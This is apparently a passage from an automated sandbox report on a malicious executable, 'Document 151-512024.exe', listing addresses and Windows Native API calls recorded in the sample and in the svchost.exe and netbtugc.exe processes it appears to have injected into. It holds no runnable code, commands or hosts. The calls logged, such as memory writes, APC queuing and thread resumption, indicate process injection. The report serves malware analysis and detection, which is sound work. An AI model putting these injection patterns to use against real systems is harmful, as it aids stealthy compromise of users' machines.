Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372AB0 NtWaitForSingleObject,	2_2_03372AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372AF0 NtWriteFile,	2_2_03372AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372AD0 NtReadFile,	2_2_03372AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372F30 NtCreateSection,	2_2_03372F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372F60 NtCreateProcessEx,	2_2_03372F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372FB0 NtResumeThread,	2_2_03372FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372FA0 NtQuerySection,	2_2_03372FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372F90 NtProtectVirtualMemory,	2_2_03372F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372FE0 NtCreateFile,	2_2_03372FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372E30 NtWriteVirtualMemory,	2_2_03372E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372EA0 NtAdjustPrivilegesToken,	2_2_03372EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372E80 NtReadVirtualMemory,	2_2_03372E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372EE0 NtQueueApcThread,	2_2_03372EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372D30 NtUnmapViewOfSection,	2_2_03372D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372D10 NtMapViewOfSection,	2_2_03372D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372D00 NtSetInformationFile,	2_2_03372D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372DB0 NtEnumerateKey,	2_2_03372DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372DD0 NtDelayExecution,	2_2_03372DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372C00 NtQueryInformationProcess,	2_2_03372C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372C60 NtCreateKey,	2_2_03372C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372CA0 NtQueryInformationToken,	2_2_03372CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372CF0 NtOpenProcess,	2_2_03372CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372CC0 NtQueryVirtualMemory,	2_2_03372CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03373010 NtOpenDirectoryObject,	2_2_03373010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03373090 NtSetValueKey,	2_2_03373090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033739B0 NtGetContextThread,	2_2_033739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03373D10 NtOpenProcessToken,	2_2_03373D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03373D70 NtOpenThread,	2_2_03373D70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03434340 NtSetContextThread,LdrInitializeThunk,	10_2_03434340
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03434650 NtSuspendThread,LdrInitializeThunk,	10_2_03434650
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432B60 NtClose,LdrInitializeThunk,	10_2_03432B60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432BE0 NtQueryValueKey,LdrInitializeThunk,	10_2_03432BE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_03432BF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432BA0 NtEnumerateValueKey,LdrInitializeThunk,	10_2_03432BA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432AD0 NtReadFile,LdrInitializeThunk,	10_2_03432AD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432AF0 NtWriteFile,LdrInitializeThunk,	10_2_03432AF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432F30 NtCreateSection,LdrInitializeThunk,	10_2_03432F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432FE0 NtCreateFile,LdrInitializeThunk,	10_2_03432FE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432FB0 NtResumeThread,LdrInitializeThunk,	10_2_03432FB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432EE0 NtQueueApcThread,LdrInitializeThunk,	10_2_03432EE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432E80 NtReadVirtualMemory,LdrInitializeThunk,	10_2_03432E80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432D10 NtMapViewOfSection,LdrInitializeThunk,	10_2_03432D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432D30 NtUnmapViewOfSection,LdrInitializeThunk,	10_2_03432D30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432DD0 NtDelayExecution,LdrInitializeThunk,	10_2_03432DD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_03432DF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432C60 NtCreateKey,LdrInitializeThunk,	10_2_03432C60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_03432C70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432CA0 NtQueryInformationToken,LdrInitializeThunk,	10_2_03432CA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034335C0 NtCreateMutant,LdrInitializeThunk,	10_2_034335C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034339B0 NtGetContextThread,LdrInitializeThunk,	10_2_034339B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432B80 NtQueryInformationFile,	10_2_03432B80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432AB0 NtWaitForSingleObject,	10_2_03432AB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432F60 NtCreateProcessEx,	10_2_03432F60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432F90 NtProtectVirtualMemory,	10_2_03432F90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432FA0 NtQuerySection,	10_2_03432FA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432E30 NtWriteVirtualMemory,	10_2_03432E30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432EA0 NtAdjustPrivilegesToken,	10_2_03432EA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432D00 NtSetInformationFile,	10_2_03432D00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432DB0 NtEnumerateKey,	10_2_03432DB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432C00 NtQueryInformationProcess,	10_2_03432C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432CC0 NtQueryVirtualMemory,	10_2_03432CC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03432CF0 NtOpenProcess,	10_2_03432CF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03433010 NtOpenDirectoryObject,	10_2_03433010
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03433090 NtSetValueKey,	10_2_03433090
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03433D70 NtOpenThread,	10_2_03433D70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03433D10 NtOpenProcessToken,	10_2_03433D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C27A70 NtReadFile,	10_2_02C27A70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C27BE0 NtClose,	10_2_02C27BE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C27B50 NtDeleteFile,	10_2_02C27B50
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C27920 NtCreateFile,	10_2_02C27920
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C27D30 NtAllocateVirtualMemory,	10_2_02C27D30

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_009AD5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_009AD5EB

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_009A1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_009A1201

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_009AE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_009AE8F6

Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009B2046	0_2_009B2046
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_00948060	0_2_00948060
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009A8298	0_2_009A8298
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_0097E4FF	0_2_0097E4FF
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_0097676B	0_2_0097676B
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009D4873	0_2_009D4873
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_0096CAA0	0_2_0096CAA0
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_0094CAF0	0_2_0094CAF0
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_0095CC39	0_2_0095CC39
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_00976DD9	0_2_00976DD9
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009491C0	0_2_009491C0
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_0095B119	0_2_0095B119
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_00961394	0_2_00961394
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_00961706	0_2_00961706
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_0096781B	0_2_0096781B
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009619B0	0_2_009619B0
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_00947920	0_2_00947920
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_0095997D	0_2_0095997D
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_00967A4A	0_2_00967A4A
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_00967CA7	0_2_00967CA7
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_00961C77	0_2_00961C77
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_00979EEE	0_2_00979EEE
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009CBE44	0_2_009CBE44
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_00961F32	0_2_00961F32
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_01BC3660	0_2_01BC3660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416871	2_2_00416871
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416873	2_2_00416873
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004028A0	2_2_004028A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410173	2_2_00410173
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401110	2_2_00401110
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E1F3	2_2_0040E1F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401290	2_2_00401290
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403500	2_2_00403500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040268A	2_2_0040268A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402698	2_2_00402698
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004026A0	2_2_004026A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FF4A	2_2_0040FF4A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042D753	2_2_0042D753
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FF53	2_2_0040FF53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FA352	2_2_033FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034003E6	2_2_034003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E3F0	2_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C02C0	2_2_033C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DA118	2_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330100	2_2_03330100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C8158	2_2_033C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F41A2	2_2_033F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034001AA	2_2_034001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F81CC	2_2_033F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03364750	2_2_03364750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333C7C0	2_2_0333C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335C6E0	2_2_0335C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340535	2_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03400591	2_2_03400591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E4420	2_2_033E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F2446	2_2_033F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EE4F6	2_2_033EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FAB40	2_2_033FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F6BD7	2_2_033F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03356962	2_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340A9A6	2_2_0340A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334A840	2_2_0334A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03342840	2_2_03342840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033268B8	2_2_033268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E8F0	2_2_0336E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03360F30	2_2_03360F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E2F30	2_2_033E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03382F28	2_2_03382F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B4F40	2_2_033B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BEFA0	2_2_033BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334CFE0	2_2_0334CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03332FC8	2_2_03332FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FEE26	2_2_033FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340E59	2_2_03340E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352E90	2_2_03352E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FCE93	2_2_033FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FEEDB	2_2_033FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DCD1F	2_2_033DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334AD00	2_2_0334AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03358DBF	2_2_03358DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333ADE0	2_2_0333ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340C00	2_2_03340C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0CB5	2_2_033E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330CF2	2_2_03330CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F132D	2_2_033F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332D34C	2_2_0332D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0338739A	2_2_0338739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033452A0	2_2_033452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E12ED	2_2_033E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335B2C0	2_2_0335B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340B16B	2_2_0340B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332F172	2_2_0332F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0337516C	2_2_0337516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334B1B0	2_2_0334B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F70E9	2_2_033F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FF0E0	2_2_033FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EF0CC	2_2_033EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033470C0	2_2_033470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FF7B0	2_2_033FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033317EC	2_2_033317EC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03385630	2_2_03385630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F16CC	2_2_033F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F7571	2_2_033F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034095C3	2_2_034095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DD5B0	2_2_033DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FF43F	2_2_033FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03331460	2_2_03331460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FFB76	2_2_033FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335FB80	2_2_0335FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B5BF0	2_2_033B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0337DBF9	2_2_0337DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B3A6C	2_2_033B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FFA49	2_2_033FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F7A46	2_2_033F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DDAAC	2_2_033DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03385AA0	2_2_03385AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E1AA3	2_2_033E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EDAC6	2_2_033EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D5910	2_2_033D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03349950	2_2_03349950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335B950	2_2_0335B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AD800	2_2_033AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033438E0	2_2_033438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FFF09	2_2_033FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FFFB1	2_2_033FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03341F92	2_2_03341F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03349EB0	2_2_03349EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F7D73	2_2_033F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F1D5A	2_2_033F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03343D40	2_2_03343D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335FDC0	2_2_0335FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B9C32	2_2_033B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FFCF2	2_2_033FFCF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034BA352	10_2_034BA352
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034C03E6	10_2_034C03E6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0340E3F0	10_2_0340E3F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034A0274	10_2_034A0274
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034802C0	10_2_034802C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03488158	10_2_03488158
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_033F0100	10_2_033F0100
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0349A118	10_2_0349A118
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034B81CC	10_2_034B81CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034C01AA	10_2_034C01AA
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034B41A2	10_2_034B41A2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03492000	10_2_03492000
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03424750	10_2_03424750
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03400770	10_2_03400770
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_033FC7C0	10_2_033FC7C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0341C6E0	10_2_0341C6E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03400535	10_2_03400535
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034C0591	10_2_034C0591
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034B2446	10_2_034B2446
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034A4420	10_2_034A4420
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034AE4F6	10_2_034AE4F6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034BAB40	10_2_034BAB40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034B6BD7	10_2_034B6BD7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_033FEA80	10_2_033FEA80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03416962	10_2_03416962
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034029A0	10_2_034029A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034CA9A6	10_2_034CA9A6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0340A840	10_2_0340A840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03402840	10_2_03402840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_033E68B8	10_2_033E68B8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0342E8F0	10_2_0342E8F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03474F40	10_2_03474F40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03442F28	10_2_03442F28
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03420F30	10_2_03420F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034A2F30	10_2_034A2F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0340CFE0	10_2_0340CFE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0347EFA0	10_2_0347EFA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_033F2FC8	10_2_033F2FC8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03400E59	10_2_03400E59
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034BEE26	10_2_034BEE26
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034BEEDB	10_2_034BEEDB
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03412E90	10_2_03412E90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034BCE93	10_2_034BCE93
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0340AD00	10_2_0340AD00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0349CD1F	10_2_0349CD1F
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_033FADE0	10_2_033FADE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03418DBF	10_2_03418DBF
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03400C00	10_2_03400C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_033F0CF2	10_2_033F0CF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034A0CB5	10_2_034A0CB5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034B132D	10_2_034B132D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_033ED34C	10_2_033ED34C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0344739A	10_2_0344739A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0341B2C0	10_2_0341B2C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034A12ED	10_2_034A12ED
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034052A0	10_2_034052A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034CB16B	10_2_034CB16B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0343516C	10_2_0343516C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_033EF172	10_2_033EF172
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0340B1B0	10_2_0340B1B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034070C0	10_2_034070C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034AF0CC	10_2_034AF0CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034B70E9	10_2_034B70E9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034BF0E0	10_2_034BF0E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_033F17EC	10_2_033F17EC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034BF7B0	10_2_034BF7B0
